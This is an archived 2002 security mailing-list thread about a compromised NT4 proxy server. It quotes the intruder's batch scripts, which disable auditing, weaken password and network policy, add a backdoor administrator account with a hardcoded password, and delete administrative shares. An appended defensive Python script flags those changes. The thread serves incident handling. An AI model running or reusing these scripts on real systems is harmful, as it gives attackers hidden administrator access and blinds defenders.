RE: Proxy server hit... Any ideas?
From: ZeroBreak (ZeroBreak@softhome.net)
Date: 11/21/02
- Previous message: Jeroen Wesbeek: "Strange apache logs: CONNECT maila.microsoft.com:25"
- In reply to: Mike Cain: "Proxy server hit... Any ideas?"
- Next in thread: Russell Harding: "Re: Proxy server hit... Any ideas?"
From: "ZeroBreak" <ZeroBreak@softhome.net>
To: incidents@securityfocus.com
Date: Wed, 20 Nov 2002 20:52:25 -0500
I have seen a lot of this. A bunch of script kiddies scanning for the most obvious holes. From some of the ones I've seen, it looked like some of them were using an automated script to do pretty much all of the work; others did it manually. Most of the servers were running Serv-U FTP and an IRC bot, and were pretty much being zombies.

Obviously I would consider reinstalling and patching the system. It doesn't take long at all to reinstall NT and set up proxy. But if this is something you can't take down for a day or so, then I wouldn't consider it that big of a deal. Delete the stuff they installed and patch the system so they can't do it again. It wasn't solely an attack on your network, so you have a better chance of them not pilfering through all your data. More so just using it as another server to add to their list. Just look at what IRC server & channel the bot connected to; you'll see all the others :).
Have fun.
-- ZeroBreak
-----Original Message-----
From: Mike Cain [mailto:mikec@lpinsurance.com]
Sent: Monday, November 18, 2002 9:01 AM
To: incidents@securityfocus.com
Subject: Proxy server hit... Any ideas?
Well, I have had my first run-in with a hacker, or was it a virus? I'm not 100% sure. Guess I should start from the beginning...

A few days ago, I began to get user complaints on the slowness of the internet. I figured it was mostly them just wanting something to complain about, so I did what all crappy admins do, I ignored it. Well, last night the box was rebooted after some software was updated. Today people were complaining about how PAINFULLY slow the internet was, so I looked at the proxy server. NT4 running proxy3. I know, there is newer, better stuff, but it's what I have to work with. :) SO... I looked at the processes and noticed the CPU hovering at 35-50%. Way too high. So a quick look at the process list showed two things that I didn't remember needing to be there, win.exe and start.exe. Next move was to find them, and they were in the winnt\system\ folder. What I also found odd was that there were three new folders in that directory, all created on the 8th: NT, tools, and win.
Here are the contents, respectively.
1. NT: 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe (antivirus sees this one as a backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup
2. tools: temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility Routine), and _zoLibr.dll
3. win: (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below), pidv32.dll, win.exe, x32.dll.bkup
SO, anyone know what I have or what hit me? From looking at the secure and secure1 batch files, it looks like a rootkit... But I'm new at this side of security (I'm a Cisco guy...)

Last thing, the logs show that the attacker was hitting the \scripts\sample\ folder... Meaning I think he was trying to use the old IIS Sample Scripts to execute local code... Not sure if he was successful...
Thanks in advance!!
Mike Cain
CCNP/MCSE
Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
echo Adding slash to the Local Administrator Group ...
net localgroup administrators slash /add
echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
echo System is now secure.
Secure1.bat =
net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld
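The secure.bat quoted above is a small toolkit in itself: it writes a secedit security template to a file named temp, grants the network logon right to whatever is passed as %1, creates a local account and puts it in Administrators, then applies only the USER_RIGHTS area of the template. The Python below is an added example written for this page, not code from the thread or from either poster. It recovers the template from the batch's `echo ... >> temp` lines, parses it, and lists the settings a responder should care about (auditing switched off, blank passwords and no lockout permitted, restrictanonymous and lmcompatibilitylevel at 0, a privilege granted to something that is not a SID) alongside the account-creation commands. SAMPLE_BATCH is a constructed excerpt of the posted script; the function names are this example's own.

```python
"""Triage an intruder's secedit batch like the secure.bat quoted above.
Added example, not code from the thread.  SAMPLE_BATCH is a constructed
excerpt of that script; the function names below are this example's own."""

# Constructed excerpt of the posted secure.bat (a subset of its echo lines).
SAMPLE_BATCH = r"""@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo [System Access] >> temp
echo MinimumPasswordLength = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo [Event Audit] >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo senetworklogonright = %1 >> temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
net localgroup administrators slash /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
"""


def template_from_batch(batch_text, target="temp"):
    """Recover the INF text the batch builds with 'echo ... >> <target>' lines."""
    suffix = ">> " + target
    lines = []
    for line in batch_text.splitlines():
        s = line.strip()
        if s.lower().startswith("echo ") and s.endswith(suffix):
            lines.append(s[5:-len(suffix)].strip())
    return "\n".join(lines) + "\n"


def parse_template(text):
    """Return {section: {key: value}} from INF-style text (keys lowercased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def flag_weak_template(text):
    """Return (section, key, reason) triples for settings that weaken the host."""
    t = parse_template(text)
    findings = []
    for key, value in t.get("event audit", {}).items():
        if value == "0":
            findings.append(("event audit", key, "auditing disabled"))
    access = t.get("system access", {})
    if access.get("minimumpasswordlength") == "0":
        findings.append(("system access", "minimumpasswordlength", "blank passwords allowed"))
    if access.get("lockoutbadcount") == "0":
        findings.append(("system access", "lockoutbadcount", "no account lockout"))
    weak_reg = {  # registry leaf -> (data value that is weak, reason)
        "restrictanonymous": ("0", "anonymous enumeration permitted"),
        "lmcompatibilitylevel": ("0", "LM responses sent on the wire"),
        "enableplaintextpassword": ("1", "plaintext SMB passwords allowed"),
    }
    for key, value in t.get("registry values", {}).items():
        leaf = key.rsplit("\\", 1)[-1]
        data = value.split(",", 1)[1] if "," in value else value  # "type,data"
        if leaf in weak_reg and data == weak_reg[leaf][0]:
            findings.append(("registry values", leaf, weak_reg[leaf][1]))
    for key, value in t.get("privilege rights", {}).items():
        for grantee in (g.strip() for g in value.split(",") if g.strip()):
            if not grantee.startswith("*S-1-"):  # a name or %1, not a SID
                findings.append(("privilege rights", key, "grantee is not a SID: " + grantee))
    return findings


def flag_account_changes(batch_text):
    """Find 'net user ... /add' and 'net localgroup administrators ... /add'."""
    findings = []
    for line in batch_text.splitlines():
        low = line.strip().lower()
        if low.startswith("net user") and "/add" in low:
            names = [t for t in low.split()[2:] if not t.startswith("/")]
            if names:
                findings.append(("net user", names[0], "local account created"))
        elif low.startswith("net localgroup administrators") and "/add" in low:
            names = [t for t in low.split()[3:] if not t.startswith("/")]
            if names:
                findings.append(("net localgroup", names[0], "added to Administrators"))
    return findings


def triage(batch_text):
    """Template weaknesses followed by account changes, for one batch file."""
    return flag_weak_template(template_from_batch(batch_text)) + flag_account_changes(batch_text)


if __name__ == "__main__":
    for section, key, reason in triage(SAMPLE_BATCH):
        print(f"{section:17} {key:32} {reason}")
```

Two points the output makes concrete. First, secedit's `/areas USER_RIGHTS` applies only the [Privilege Rights] section, so of everything the batch writes, the part that actually lands on the box is the network logon right handed to %1; the disabled auditing and the lsa values are inert unless the template is applied again with a wider area. Second, the script writes its template to a file literally named temp in the current directory, which is consistent with the "temp" entries Mike lists in the tools and win folders, so those files are worth collecting before cleanup.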
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- Next message: Micheal Patterson: "Re: Compromised FBSD/Apache"